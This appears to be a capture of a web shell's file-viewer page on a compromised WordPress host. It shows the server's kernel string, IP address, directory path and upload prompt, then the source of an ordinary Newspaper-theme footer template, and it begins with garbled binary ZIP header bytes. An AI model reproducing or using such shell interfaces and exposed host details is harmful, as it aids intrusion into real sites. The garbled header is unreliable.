PK œqhYî¶J‚ßFßF)nhhjz3kjnjjwmknjzzqznjzmm1kzmjrmz4qmm.itm/*\U8ewW087XJD%onwUMbJa]Y2zT?AoLMavr%5P*/ $#$#$#

Dir : /home/trave494/live2news.com/wp-content/themes/Newspaper/parts/footer/
Server: Linux ngx353.inmotionhosting.com 4.18.0-553.22.1.lve.1.el8.x86_64 #1 SMP Tue Oct 8 15:52:54 UTC 2024 x86_64
IP: 209.182.202.254
Choose File :

Url:
Dir : //home/trave494/live2news.com/wp-content/themes/Newspaper/parts/footer/td_footer_template_13.php

<div class="td-footer-wrapper td-container-wrap td-footer-template-13 <?php echo td_util::get_option('td_full_footer'); ?>">
    <div class="td-container">
        <div class="td-pb-row">
            <div class="td-pb-span12">
                <?php
                $tds_footer_top_title = td_util::get_option('tds_footer_top_title');
                // ad spot
                echo td_global_blocks::get_instance('td_block_ad_box')->render(array('spot_id' => 'footer_top', 'spot_title' => $tds_footer_top_title));

                // footer 1 sidebar
                td_global::vc_set_custom_column_number(3);
                dynamic_sidebar('Footer 1');
                ?>

                <div class="footer-social-wrap td-social-style-2">
                    <?php
                    if(td_util::get_option('tds_footer_social') != 'no') {

                        //get the socials set by user
                        $td_get_social_network = td_options::get_array('td_social_networks');

                        if(!empty($td_get_social_network)) {
                            foreach($td_get_social_network as $social_id => $social_link) {
                                if(!empty($social_link) && !empty($social_id)) {
                                    echo td_social_icons::get_icon($social_link, $social_id, true, true);
                                }
                            }
                        }
                    }
                    ?>
                </div>
            </div>
        </div>
    </div>
</div>